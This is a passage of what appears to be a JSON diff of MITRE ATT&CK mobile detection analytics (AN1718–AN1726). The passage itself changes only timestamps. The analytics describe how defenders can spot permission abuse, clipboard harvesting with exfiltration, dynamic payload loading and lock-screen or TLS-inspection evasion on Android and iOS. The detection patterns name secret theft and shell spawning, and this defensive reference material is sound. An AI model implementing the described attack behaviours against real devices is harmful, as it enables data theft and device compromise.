+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-01 15:39:38.487000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--31542445-39c5-4ae9-806f-09649581056a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0642#AN1718",
+                            "external_id": "AN1718"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1718",
+                    "description": "Correlates (1) application interaction with elevation control mechanisms (e.g., Accessibility Service, Device Admin, overlay permissions, package installer flows), (2) rapid transition to elevated capability state without expected user interaction patterns, and (3) immediate privileged actions such as sensor access, UI manipulation, or background persistence. The defender observes a causal chain where an application gains elevated privileges through abuse of system-controlled consent flows and subsequently performs actions inconsistent with normal user-driven authorization.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application granted high-risk permission or special access (AccessibilityService, SYSTEM_ALERT_WINDOW, DeviceAdmin) with abnormal grant pattern (e.g., no recent user interaction or rapid sequence of grants)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Defines correlation window between permission grant and privileged behavior"
+                        },
+                        {
+                            "field": "HighRiskPermissionSet",
+                            "description": "List of permissions or access types considered high-risk (Accessibility, Device Admin, overlay)"
+                        },
+                        {
+                            "field": "UserInteractionThreshold",
+                            "description": "Defines acceptable proximity of user interaction to permission grant"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of legitimate apps expected to use high-risk permissions"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-13 18:10:00.568000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--4b2e7e2d-e1be-4829-9011-53eb5eca3dc6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0643#AN1719",
+                            "external_id": "AN1719"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1719",
+                    "description": "From the defender view: an app registers a clipboard listener or calls ClipboardManager getters; the app is (a) foreground, (b) the default IME, or (c) abusing legacy paths. Shortly after each clipboard change, the app reads the primary clip repeatedly, optionally persists content (local file/DB) and/or exfiltrates it. We correlate: listener/clip-access \u2192 privilege/foreground confirmation \u2192 bursty reads \u2192 local write and/or network egress within a tight window.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "android:logcat",
+                            "channel": "Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "android:logcat",
+                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time between clip access \u2192 persist/exfil (e.g., 5\u201345s)."
+                        },
+                        {
+                            "field": "MinReadBurst",
+                            "description": "Minimum reads per clipboard change to flag harvesting (e.g., \u22652)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for files/DBs used to stash clipboard content in app container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Allowlisted domains to suppress false positives for analytics SDKs."
+                        },
+                        {
+                            "field": "ForegroundRequired",
+                            "description": "Require foreground unless app is the default IME (true/false)."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Work Profile/Developer Mode/Doze to scope alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-01-29 18:06:40.461000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--2f0ca83e-1318-4722-88b2-1bffedb5d127",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0643#AN1720",
+                            "external_id": "AN1720"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1720",
+                    "description": "From the defender view: an app accesses UIPasteboard contents, sometimes repeatedly, including in background or immediately after another app copies sensitive text. iOS 14+ shows user notifications when pasting cross-app; unified logs reflect pasteboard access, notification, and optional subsequent persistence/exfil. We correlate: pasteboard access \u2192 optional cross-app notification \u2192 local write (cache/DB) and/or network egress within a short window.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
+                            "name": "iOS:unifiedlog",
+                            "channel": "\\\"has pasted from\\\" cross-app paste notification text containing source app name"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Foreground/background transition for <bundle_id> to contextualize access timing"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time between pasteboard access \u2192 persist/exfil (e.g., 5\u201360s)."
+                        },
+                        {
+                            "field": "MinReadBurst",
+                            "description": "Minimum reads within window to flag harvesting (e.g., \u22652)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for paste dumps in app container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Allowlisted analytics/CDN endpoints."
+                        },
+                        {
+                            "field": "ForegroundRequired",
+                            "description": "Require foreground state for benign use; flag background reads."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Work profile/MDM policy state to scope alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-01-29 18:13:22.436000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--75a0da5c-9f2b-4e96-bb94-10c30f16a9a2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0644#AN1721",
+                            "external_id": "AN1721"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1721",
+                    "description": "From the defender view: a sandboxed process receives/creates a high-entropy Mach-O/bundle or encrypted segment, performs in-memory decrypt/unpack (mmap/mprotect RW\u2192RX or RWX), optionally drops a transient image in app-writable dirs, then loads it through dyld/dlopen or spawns it. We correlate: (1) opaque blob write/arrival \u2192 (2) kernel memory protection changes \u2192 (3) dyld/dlopen from app-writable path or posix_spawn of a recently created image \u2192 (4) (optional) code-sign evaluation anomalies for the new image.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                            "name": "iOS:unifiedlog",
+                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window from write\u2192rwx\u2192load/exec (e.g., 5\u201345s)."
+                        },
+                        {
+                            "field": "PayloadEntropyThreshold",
+                            "description": "Entropy to flag packed blobs (e.g., \u2265 7.3)."
+                        },
+                        {
+                            "field": "RWXPageMinKB",
+                            "description": "Minimum RWX allocation size (e.g., \u2265 32KB)."
+                        },
+                        {
+                            "field": "KnownJITAllowlist",
+                            "description": "Bundle IDs legitimately using JIT to avoid RWX false positives."
+                        },
+                        {
+                            "field": "WritableLoadPathRegex",
+                            "description": "Regex for app-writable load paths (tmp, Caches) outside app bundle."
+                        },
+                        {
+                            "field": "UnsignedExecPolicy",
+                            "description": "Tuning if enterprise/dev provisioning allows non-App Store binaries."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-01-29 17:01:36.709000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--d4dc642d-922b-4476-ad3f-ba23c43702f5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0644#AN1722",
+                            "external_id": "AN1722"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1722",
+                    "description": "From the defender view: a sandboxed app handles a high-entropy executable blob, performs rapid decode/decrypt in memory (often with RW\u2192RX or execmem friction), optionally emits a transient .dex/.so into app-writable paths, then immediately loads/executes it (DexClassLoader/dlopen) or spawns a helper. We correlate: (1) opaque blob write/arrival \u2192 (2) decode/unpack or memory protection change \u2192 (3) new code artifact or byte[] class definition \u2192 (4) dynamic load/exec within a tight window.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "android:logcat",
+                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window from write\u2192unpack\u2192load (e.g., 5\u201345s; device-dependent)."
+                        },
+                        {
+                            "field": "PayloadEntropyThreshold",
+                            "description": "Entropy to flag packed blobs (e.g., \u2265 7.2)."
+                        },
+                        {
+                            "field": "RWXPageMinKB",
+                            "description": "Minimum RWX allocation size to reduce noise (e.g., \u2265 32KB)."
+                        },
+                        {
+                            "field": "ExecPathRegex",
+                            "description": "Regex for suspicious .dex/.so/.jar/temp paths under app container."
+                        },
+                        {
+                            "field": "KnownGoodLoadersAllowlist",
+                            "description": "Legit libraries/bundles expected to load from writable paths (test/dev builds)."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/background, Work Profile, developer mode to scope alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-01-28 17:28:26.921000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--52a370ec-dca2-45e0-bba7-7384816945e8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0645#AN1723",
+                            "external_id": "AN1723"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1723",
+                    "description": "A lock-state transition telemetry, special access or privileged interaction capability, security-sensitive framework use, and immediate downstream activity while the user-interaction context is weak or inconsistent. This yields stronger coverage on Android than iOS.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "android:MDMLog",
+                            "channel": "Biometric, credential, lockscreen, trust-agent, Smart Lock, or device-admin-related protected device configuration changed"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Application gains or is observed with elevated interaction capability such as accessibility, overlay, device admin, notification access, or other authentication-adjacent special access"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "pplication or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum allowed time between locked-state boundary, suspicious app/framework activity, and unlock transition."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved apps permitted to hold accessibility, overlay, device-admin, or other authentication-adjacent special access."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether a benign authentication-adjacent app is expected to be visible in the foreground during unlock-related operations."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Time threshold for treating the unlock as user-driven based on touch, motion, or interaction context."
+                        },
+                        {
+                            "field": "ExpectedUnlockPopulation",
+                            "description": "User or device groups expected to use alternative lockscreen workflows, enterprise trust agents, or kiosk-like modes."
+                        },
+                        {
+                            "field": "TrustedDestinationAllowList",
+                            "description": "Expected destinations contacted immediately after legitimate unlock by enterprise apps."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for suspicious immediate post-unlock outbound traffic."
+                        },
+                        {
+                            "field": "SensorUseAllowList",
+                            "description": "Apps expected to access camera or other sensors near the authentication boundary."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-03-11 16:02:58.868000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--81a49b9b-c8cf-438c-bea0-e09149f50b34",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0645#AN1724",
+                            "external_id": "AN1724"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1724",
+                    "description": "Defender correlates an iOS-specific reduced-confidence chain where a supervised or managed device transitions from locked or inactive state to interactive or application-active state with weak evidence of expected user authentication, often accompanied by abnormal protected posture change, trust-state change, unexpected app wake, sensor use, or immediate downstream communication. Because direct visibility into lockscreen bypass mechanics on iOS is limited, the analytic prioritizes strong device-state effects and post-unlock behavior rather than pretending to observe the exact bypass method.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "iOS:MDMLog",
+                            "channel": "Passcode, biometrics, attention-aware authentication, or supervised-device lock policy changed in a way that weakens or alters the authentication boundary"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application wakes, becomes active, refreshes, or foregrounds immediately after locked or inactive state transition with weak recent user interaction"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum allowed span between locked or inactive device state, suspicious app/service activity, and interactive transition."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps allowed to wake, foreground, or access protected resources near legitimate authentication events."
+                        },
+                        {
+                            "field": "SupervisedOnly",
+                            "description": "Whether the analytic should only apply to supervised devices with high-confidence MDM policy telemetry."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Time threshold for treating the transition as expected and user-driven."
+                        },
+                        {
+                            "field": "ExpectedUnlockPopulation",
+                            "description": "User or device groups expected to use atypical enterprise lockscreen workflows, kiosk-like modes, or accessibility accommodations."
+                        },
+                        {
+                            "field": "SensorUseAllowList",
+                            "description": "Apps expected to access camera or biometric-adjacent resources near the authentication boundary."
+                        },
+                        {
+                            "field": "TrustedDestinationAllowList",
+                            "description": "Expected destinations contacted immediately after legitimate app activation post-authentication."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for suspicious immediate outbound traffic after suspicious unlock-adjacent activity."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-03-11 16:09:37.177000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--05191336-6d06-41f7-babb-5d079e4168ae",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0646#AN1725",
+                            "external_id": "AN1725"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1725",
+                    "description": "The defender correlates application TLS trust customization activity with subsequent outbound encrypted sessions that bypass enterprise interception visibility or fail only under enterprise inspection conditions. The analytic looks for an app establishing its own certificate or public-key trust logic, then initiating HTTPS sessions to destinations not aligned with approved app behavior, especially from background state or without recent user interaction. Higher-confidence observations come from Android runtime/framework telemetry showing custom trust manager, certificate validation override, or pin validation logic immediately preceding network connection attempts, combined with network evidence of failed-inspection patterns or opaque direct TLS sessions.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "TLS trust customization and outbound HTTPS session occur while app_state=background or device_locked=true or recent_user_interaction=false"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app with undeclared secure transport behavior or app category mismatch initiates opaque TLS communications inconsistent with enterprise policy baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Inspection",
+                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between trust customization activity and outbound TLS connection"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to implement SSL pinning such as banking, enterprise auth, or secure messaging apps"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved domains, IPs, and service endpoints for managed applications"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether the application is expected to establish pinned sessions only during active user-driven workflows"
+                        },
+                        {
+                            "field": "InspectionFailureThreshold",
+                            "description": "Number of repeated inspection failures or certificate mismatch events before escalating"
+                        },
+                        {
+                            "field": "RetryPatternWindow",
+                            "description": "Time tolerance for inspection failure followed by retry/direct connection pattern"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-04-06 16:02:58.850000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--93a35555-f71e-4230-9f2a-529a539e8612",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0646#AN1726",
+                            "external_id": "AN1726"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1726",
+                    "description": "The defender correlates supervised-device application posture and background execution context with network-side evidence that an app rejects enterprise inspection or performs certificate/public-key-bound trust behavior during TLS establishment. Because direct app-level pin-validation observability is weaker on iOS, the analytic is anchored primarily to network control-plane effects: repeated TLS handshake rejection under enterprise inspection, destination-specific inspection bypass patterns, or persistent opaque app-to-endpoint encrypted sessions inconsistent with baseline app behavior. Additional confidence comes from managed app identity, background execution context, and supervised device policy state.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app with undeclared secure transport behavior or unexpected network role communicates with non-baselined destination over opaque TLS"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app initiates or resumes network-capable execution while app_state=background or device_locked=true before opaque TLS session attempt"
+                        },
